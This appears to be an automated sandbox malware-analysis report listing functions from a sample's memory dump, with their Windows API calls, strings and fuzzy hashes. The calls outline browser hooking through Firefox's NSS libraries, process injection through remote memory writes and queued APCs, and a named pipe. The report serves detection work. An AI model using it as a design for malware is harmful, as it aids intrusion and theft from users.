Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSPR4.DLL,?,?,00000000), ref: 00B15BEE
LoadLibraryA.KERNEL32(NSS3.DLL,?,00000000), ref: 00B15BFC
LoadLibraryA.KERNEL32(xul.dll,?,00000000), ref: 00B15C11
GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 00B15C1F
GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 00B15C2C

Strings

NSPR4.DLL, xrefs: 00B15BDE, 00B15BE3
NSS3.DLL, xrefs: 00B15BF6, 00B15BFB
PR_GetError, xrefs: 00B15C19
xul.dll, xrefs: 00B15C0C
PR_SetError, xrefs: 00B15C21

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
API String ID: 1469910268-282796573
Opcode ID: cff822ab3851e155ed486ea3443eda148f3fc0f5d5d791c65a6e00193a679caa
Instruction ID: e7cb7347ffcd5f510fb5fc2093eacedeb5ac8288fab63534a6334dc67191e48f
Opcode Fuzzy Hash: cff822ab3851e155ed486ea3443eda148f3fc0f5d5d791c65a6e00193a679caa
Instruction Fuzzy Hash: 48215C76A807109BC311DF6DFDC1A4D77E9E788710B7000AAF508D73A0DFB0A8818B94

Uniqueness

Uniqueness Score: -1.00%

Function 00B145FF, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00B14632
GetLastError.KERNEL32 ref: 00B14640
NtSetInformationProcess.NTDLL ref: 00B1469A
GetProcAddress.KERNEL32(456C7452,00000000), ref: 00B146D9
GetProcAddress.KERNEL32(61657243), ref: 00B146FA
TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 00B14751
CloseHandle.KERNEL32(?), ref: 00B14767
CloseHandle.KERNEL32(?), ref: 00B1478D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: dcdf732f0e305fa38b2cf4ade9b4a9444b91f9a11ea1e5442f3938e891f2a05e
Instruction ID: 1f71232f1a126395ea6efdc967fe0af2e40c5ca5a937d2c3723dd67381b7cdd8
Opcode Fuzzy Hash: dcdf732f0e305fa38b2cf4ade9b4a9444b91f9a11ea1e5442f3938e891f2a05e
Instruction Fuzzy Hash: C04181701043459FD7119F25DC88AAFBBE9FB89318F5409AAF558931A0DBB1CE88CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B34FE1, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00B123F9,00000000), ref: 00B34FF9

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

FindFirstFileW.KERNEL32(?,00000000), ref: 00B35062
lstrlenW.KERNEL32(0000002C), ref: 00B3508A
RemoveDirectoryW.KERNEL32(?), ref: 00B350DC
DeleteFileW.KERNEL32(?), ref: 00B350E7
FindNextFileW.KERNEL32(00000000,00000000), ref: 00B350FA

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 7596da95620f4e50c2eb3cd025cb5b8363aa2e3ad084821fa247c56c26097cc5
Instruction ID: 4e8cf46da52c0ba908abfef1df71fa5bf60c57be2923caa1f8fcd67452f7f3dc
Opcode Fuzzy Hash: 7596da95620f4e50c2eb3cd025cb5b8363aa2e3ad084821fa247c56c26097cc5
Instruction Fuzzy Hash: AF412971900A09EFDF21AFA4DD85AAEBBF9FF04304F3041E5F915A6161DB718A44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B2956E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 00B295BD
lstrlenW.KERNEL32(?), ref: 00B295CB
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 00B295F6
lstrcpyW.KERNEL32(00000006,00000000), ref: 00B29623

Strings

SOFTWARE\Classes\Chrome, xrefs: 00B2963A
DelegateExecute, xrefs: 00B29595

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Query$lstrcpylstrlen
String ID: DelegateExecute$SOFTWARE\Classes\Chrome
API String ID: 3961825720-1743081400
Opcode ID: bb692567db72bba0502a4eb0df8f10c8bf0ba51dc6f73dd6b17d10c6fafa4b3b
Instruction ID: 61c103325eebafc845ecfe07eb6892566951e19a2a5ac83c92b860ee26924123
Opcode Fuzzy Hash: bb692567db72bba0502a4eb0df8f10c8bf0ba51dc6f73dd6b17d10c6fafa4b3b
Instruction Fuzzy Hash: 85313871900219FFDB129FA8ED85A9EBBE8FF04714F2040A9B909A2160DB71EE11DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B3298D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B329AF

Part of subcall function 00B19DAC: NtAllocateVirtualMemory.NTDLL(00B329D7,00000000,00000000,00B329D7,00003000,00000040), ref: 00B19DDD
Part of subcall function 00B19DAC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B19DE4
Part of subcall function 00B19DAC: SetLastError.KERNEL32(00000000), ref: 00B19DEB

GetLastError.KERNEL32(?,00000318,00000008), ref: 00B32ABF

Part of subcall function 00B24C67: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B24C7F

memcpy.NTDLL(00000218,00B36E10,00000100,?,00010003,?,?,00000318,00000008), ref: 00B32A3E
RtlNtStatusToDosError.NTDLL(00000000), ref: 00B32A98

Strings

, xrefs: 00B32A05

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
String ID:
API String ID: 2966525677-3916222277
Opcode ID: 05bf58fdaa8a4099554cef0bbbf740892f90fc1aa9f183494034e685802b56f2
Instruction ID: e17e6bb06d59985677b12ab2baffddf8a432cec6fc6994ca3e71b1f16daaa2b7
Opcode Fuzzy Hash: 05bf58fdaa8a4099554cef0bbbf740892f90fc1aa9f183494034e685802b56f2
Instruction Fuzzy Hash: 37316D75901209AFDB30DFA4D985AAAB7F8FB04304F2445BAE519E7251EB30AE44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B2ED4B, Relevance: 7.9, APIs: 6, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 00B25393: memset.NTDLL ref: 00B253B3

Part of subcall function 00B25393: memset.NTDLL ref: 00B254E7
Part of subcall function 00B25393: memset.NTDLL ref: 00B254FC

memcpy.NTDLL(?,00008F12,0000011E), ref: 00B2EDD0
memset.NTDLL ref: 00B2EE06
memset.NTDLL ref: 00B2EE54
memset.NTDLL ref: 00B2EED3
memset.NTDLL ref: 00B2EF42
memset.NTDLL ref: 00B2F012

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: db5f9270484b331dee0538a28484101c97ae6abe29aab614e4179945152d42d5
Instruction ID: e38d5fc9c763b35a09f48bfe55bbecd9e981d16faecc4c565682bccb06f2b2bd
Opcode Fuzzy Hash: db5f9270484b331dee0538a28484101c97ae6abe29aab614e4179945152d42d5
Instruction Fuzzy Hash: 1DF1D030500BAACFDB31CF69D5946AABBF0FF51300F2449BDD5EA96682D231EA45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B585, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,00B3E0D4,00B3E08C), ref: 00B2B5A9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B317C0), ref: 00B2B5F4

Part of subcall function 00B2C0AB: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,00B1402D), ref: 00B2C0C2
Part of subcall function 00B2C0AB: QueueUserAPC.KERNELBASE(?,00000000,?,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0D7
Part of subcall function 00B2C0AB: GetLastError.KERNEL32(00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0E2
Part of subcall function 00B2C0AB: TerminateThread.KERNEL32(00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0EC
Part of subcall function 00B2C0AB: CloseHandle.KERNEL32(00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0F3
Part of subcall function 00B2C0AB: SetLastError.KERNEL32(00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B2C0FC

GetLastError.KERNEL32(Function_00005A92,00000000,00000000), ref: 00B2B5DC
CloseHandle.KERNEL32(00000000), ref: 00B2B5EC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: 2b295beb9aacb05223275021fbd1e58459156e9bc058f651b188c9f656b4b723
Instruction ID: 82eba966f1b989f234127853bf27764e46f3ee8a74a07d5d0009fbd0ab0e6bef
Opcode Fuzzy Hash: 2b295beb9aacb05223275021fbd1e58459156e9bc058f651b188c9f656b4b723
Instruction Fuzzy Hash: 41F0A471385311AFE3285B69ACC9E6B77A8EB45331B200675FA2DC72E0CFA04C458A71

Uniqueness

Uniqueness Score: -1.00%

Function 00B17878, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 00B1788C
GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 00B178CC

Part of subcall function 00B137E7: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,00B32A79,00000000,?,00B32A79,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 00B13805

RtlNtStatusToDosError.NTDLL(00000000), ref: 00B178D5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
String ID:
API String ID: 4036914670-0
Opcode ID: 68e4635afb9090c48a8bcbe7ece57d91db64eaf0143cef0cc2037e9a2f576c0b
Instruction ID: 9a52042776ec80fb98b7263f479b889b691efd5f0148fb7364ba0066f2615a81
Opcode Fuzzy Hash: 68e4635afb9090c48a8bcbe7ece57d91db64eaf0143cef0cc2037e9a2f576c0b
Instruction Fuzzy Hash: 12014675980208FBEB10ABA6DC49DEEBBFDEB84700F500465F901E3060EB31D944DB21

Uniqueness

Uniqueness Score: -1.00%

Function 001F7890, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000), ref: 001F78A9

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

wsprintfA.USER32 ref: 001F7914

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: AllocateHeapVersionwsprintf
String ID:
API String ID: 3641471311-0
Opcode ID: bf694668c27f15a6a214bbbb9c84c83b581196194bb746880f63477c504567bf
Instruction ID: 984020db587ea7db6b93274a6b59bc266e29205825580aac1d6cdee107b9fd04
Opcode Fuzzy Hash: bf694668c27f15a6a214bbbb9c84c83b581196194bb746880f63477c504567bf
Instruction Fuzzy Hash: 07118E72D0422E9BDF109FA4DC45ABEB7F9BF04305F144519FA10E2191E3388955DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1AA15, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00B1AA46
RtlNtStatusToDosError.NTDLL(C000009A), ref: 00B1AA7D

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: 22cb87fd78b9064a9e255698a2a8bb318968ea2296d2c9cb0f292ee771b90c1b
Instruction ID: 9ff84db676a51f0f59cc24b7ea5700bf9bf64b12609d8bff0e834e03bc4e755c
Opcode Fuzzy Hash: 22cb87fd78b9064a9e255698a2a8bb318968ea2296d2c9cb0f292ee771b90c1b
Instruction Fuzzy Hash: 2A01F936823534FBC7219B948F04AEFBAE8DF46B50F520094BD15A3110DB35BE81DAE2

Uniqueness

Uniqueness Score: -1.00%

Function 00B240A7, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B240C6
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00B240DE

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: 70bd10b88ba5c136594eae28c7a9dac7aecf97900c2874e6289762a647d6657e
Instruction ID: 55aee07605bb5f265c9c3cac8a0bc0ee7df50c081936b63be0c340b37bee01db
Opcode Fuzzy Hash: 70bd10b88ba5c136594eae28c7a9dac7aecf97900c2874e6289762a647d6657e
Instruction Fuzzy Hash: C7F04F7690022CBADB20DA90DC09FDE7BACEB14740F4440A1FE08E6091D770DA94CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B21606, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 00B21633
SetLastError.KERNEL32(00000000,?,00B2197E,?,00000000,00000000,00000004,?,00000000,00000000,73B74EE0,00000000), ref: 00B2163A

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 5a2de11a474c588dd8f17dbfc6256f057b79b2ccec0bfca5e535d886162e04f9
Instruction ID: c2e6e9e86e7349fb75063c5a9f026a85cdde7e6ac729c422cc4caa1b201a6ee5
Opcode Fuzzy Hash: 5a2de11a474c588dd8f17dbfc6256f057b79b2ccec0bfca5e535d886162e04f9
Instruction Fuzzy Hash: 85E0BF7264022AABCF125FE9AC05D9F7BADEB5C791B148411BE05D3120CB35D861ABF1

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D0DC, Relevance: 2.9, APIs: 2, Instructions: 416COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B1D4B4
memset.NTDLL ref: 00B1D4C3

Part of subcall function 00B19DFC: memset.NTDLL ref: 00B19E0D
Part of subcall function 00B19DFC: memset.NTDLL ref: 00B19E19
Part of subcall function 00B19DFC: memset.NTDLL ref: 00B19E44

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 901fb57dd579aca51b006c865f834b69d11bb4b6438bcc436a2491ef44e66cbb
Instruction ID: 008dd802bf4a4060013265c47b5f546e0d7c3c180cb2b9290f6ff758b571ddc9
Opcode Fuzzy Hash: 901fb57dd579aca51b006c865f834b69d11bb4b6438bcc436a2491ef44e66cbb
Instruction Fuzzy Hash: 24021071601B618FCB79CF29C6805A6B7F1FF647107A04AAED6E786A90D331F885CB14

Uniqueness

Uniqueness Score: -1.00%

Function 001F40B3, Relevance: 1.9, APIs: 1, Instructions: 610COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001F474A

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 76e46944f84daaa01ea072971a7fcb4a38b1c86d297bf45b97353656dd6275f2
Instruction ID: bc5a03e9fa4726c8554ccea564152080a14455fcec813b3f6122b74912bd33c7
Opcode Fuzzy Hash: 76e46944f84daaa01ea072971a7fcb4a38b1c86d297bf45b97353656dd6275f2
Instruction Fuzzy Hash: 0822837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00B28BF3, Relevance: 1.9, APIs: 1, Instructions: 610COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B2928A

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ecbea8a852eaafebc1e0ec98c08f47c6db272d4ef72c1f33184d83e3dde19467
Instruction ID: e2a328588fb139064029da3bd2a35b1135019e8732e22b60a119cad481425d94
Opcode Fuzzy Hash: ecbea8a852eaafebc1e0ec98c08f47c6db272d4ef72c1f33184d83e3dde19467
Instruction Fuzzy Hash: B422837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00B1E384, Relevance: 1.8, Strings: 1, Instructions: 583COMMON

Download Yara Rule

Strings

, xrefs: 00B1E6E9

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 40c85ca80d0aeb98eb6f3e92d44f070ab3c88da8a05bb06e626ab7d63e6945bd
Instruction ID: 486467b9cfba5a20ccd0810d14c19ed995b96672d444214720e5da2152a60ead
Opcode Fuzzy Hash: 40c85ca80d0aeb98eb6f3e92d44f070ab3c88da8a05bb06e626ab7d63e6945bd
Instruction Fuzzy Hash: CD428E70A00B458FCB29CF65C4906EAB7F1FF99304FA889ADD8A797651D734E885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B2D057, Relevance: 1.8, APIs: 1, Instructions: 556COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,00000000,000000FE,00000000,?,00000000), ref: 00B2D415

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 435460efd0be7fac3529dbba2d3b4b4d221d27340f0d461227ec893a25bef24f
Instruction ID: 837c0a0ed8b1bd83ad47709fe177df387d57d5bfcfd970fc8ed9b9eaae809194
Opcode Fuzzy Hash: 435460efd0be7fac3529dbba2d3b4b4d221d27340f0d461227ec893a25bef24f
Instruction Fuzzy Hash: AC325871A00224DFDF19CF59D4816AEBBF1FF94310F2481E9D859AB286D774DA82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B14C03, Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

@, xrefs: 00B14F3D

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8042252bb0093b52c2f303253d007311be95e502882113604dd22d358b571254
Instruction ID: 198e92d811a05b62b90a172e0fb2b7c23940e96e7d1e7b72c12346797b619238
Opcode Fuzzy Hash: 8042252bb0093b52c2f303253d007311be95e502882113604dd22d358b571254
Instruction Fuzzy Hash: C2D14A71A0024ACFCF18CFA8D4905EEBBF2FF94314F6485ADE85697250E7709A95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B31CB8, Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B31CF2

Part of subcall function 00B1D9EB: ResumeThread.KERNEL32(00000004,?,00B19809,?), ref: 00B1DA00

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CreateProcessResumeThreadUser
String ID:
API String ID: 3393100766-0
Opcode ID: d2e68dcc93e8cdca8350f4cdaf51f64e3747feab72d02f525db547c5f05131b9
Instruction ID: 4fb477d2ecd70ae59eb820912846636f5b9904704ed858b3e5705d46c22065d5
Opcode Fuzzy Hash: d2e68dcc93e8cdca8350f4cdaf51f64e3747feab72d02f525db547c5f05131b9
Instruction Fuzzy Hash: 85F0F932215109AF9F024F99DC41CDA7FAAFF49374B154225FE19A2160C772DC21DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B24C67, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 00B24C7F

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: b474bc3f5162460d4df9a77afd9e8daf204872a850287d4cae5390cb9e8c7660
Instruction ID: 198b889702f94c35b54034e6d50429adf9ce7baf70b3498e89b3afe0293f3d3e
Opcode Fuzzy Hash: b474bc3f5162460d4df9a77afd9e8daf204872a850287d4cae5390cb9e8c7660
Instruction Fuzzy Hash: 69C012316452017FDA195B10ED1D92E7A65EB90340F10481CB04D82070DFB09850C611

Uniqueness

Uniqueness Score: -1.00%

Function 00B2DA71, Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ddb6ec45234179c2fbae36eade5b11a20316c4d26a017989426ddc04973a05
Instruction ID: e47c73626b465e9d1e9ce0558a9e066fb49898b9f27d564424eb6612b1cc8a44
Opcode Fuzzy Hash: b6ddb6ec45234179c2fbae36eade5b11a20316c4d26a017989426ddc04973a05
Instruction Fuzzy Hash: 2F022671E00229DFCF18CF58D5906ADBBF2FF89311F1481AAE856AB285D7349A41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B33EAF, Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
Instruction ID: fa8059407f9c9305b2506b30f84265636e8c29309b4f93cbc7438bbf6060eb3b
Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
Instruction Fuzzy Hash: ECF15530A08A59ABCB0CCF99D4A04ADBBB2FF99314F24C19EE49667645CB346A45CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00B248AD, Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 48e572483916b0ab960ad17f3894c40c5fdd2749ab245f2d140a1afae4b410a2
Instruction ID: 1d5840fd0a44fedaf8dd972d23048ab7278fc62882bb229a54d8727d2c65aa0c
Opcode Fuzzy Hash: 48e572483916b0ab960ad17f3894c40c5fdd2749ab245f2d140a1afae4b410a2
Instruction Fuzzy Hash: 49C10035600B608FD325CF29D580AA6B3E1FF49304B5449AED9DB8BB65DB75F881CB00

Uniqueness

Uniqueness Score: -1.00%

Function 001FAF44, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 8773435058a20f0571f98b144e0515a8f751acdb5a7919714e5281671e32a0a2
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: B321B6729042089FCB14DF68C8C19BBBBB9FF45350B468168EA19DB245DB30F915C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B37188, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
Instruction ID: 647185443bcb720bf5c36f01c0fb4bd658963c5b0cd7b18837d96dda77e7b751
Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
Instruction Fuzzy Hash: 9121C4B29442049BCB20DF69CC809A7FBE5FF46360F1580A9EC559B245DB30F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00B11E8A, Relevance: 51.4, APIs: 34, Instructions: 399synchronizationtimethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B239D7: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 00B23A0B
Part of subcall function 00B239D7: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 00B23ACC
Part of subcall function 00B239D7: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 00B23AD5

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 00B11F28

Part of subcall function 00B13828: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B13842
Part of subcall function 00B13828: CreateWaitableTimerA.KERNEL32(00B3E0D4,00000003,?), ref: 00B1385F
Part of subcall function 00B13828: GetLastError.KERNEL32(?,?,00B23A3F,?,?,?,00000000,?,?,?), ref: 00B13870
Part of subcall function 00B13828: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00B23A3F,?,?,?,00B23A3F,?), ref: 00B138B0
Part of subcall function 00B13828: SetWaitableTimer.KERNEL32(00000000,00B23A3F,00000000,00000000,00000000,00000000,?,?,00B23A3F,?), ref: 00B138CF
Part of subcall function 00B13828: HeapFree.KERNEL32(00000000,00B23A3F,00000000,00B23A3F,?,?,?,00B23A3F,?), ref: 00B138E5

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 00B11F8B
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B1200B
WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 00B120B0

Part of subcall function 00B208B3: RtlAllocateHeap.NTDLL(00000000,00000010,73BCF730), ref: 00B208D5
Part of subcall function 00B208B3: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?,?,?,?,00B11F61,?), ref: 00B20906

WaitForSingleObject.KERNEL32(?,00000000,?), ref: 00B120E5
WaitForSingleObject.KERNEL32(?,00000000), ref: 00B120F4
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B12121
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B1213B
_allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 00B12183
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000000), ref: 00B1219D
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B121B3
ReleaseMutex.KERNEL32(?), ref: 00B121D0
WaitForSingleObject.KERNEL32(?,00000000), ref: 00B121E1
WaitForSingleObject.KERNEL32(?,00000000), ref: 00B121F0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B12224
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B1223E
SwitchToThread.KERNEL32 ref: 00B12240
ReleaseMutex.KERNEL32(?), ref: 00B1224A
WaitForSingleObject.KERNEL32(?,00000000), ref: 00B12288

Part of subcall function 00B1AC31: RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00B1AC4F
Part of subcall function 00B1AC31: RegQueryValueExA.ADVAPI32(?,Main,00000000,73BCF710,00000000,?,73BCF710,00000000), ref: 00B1AC74
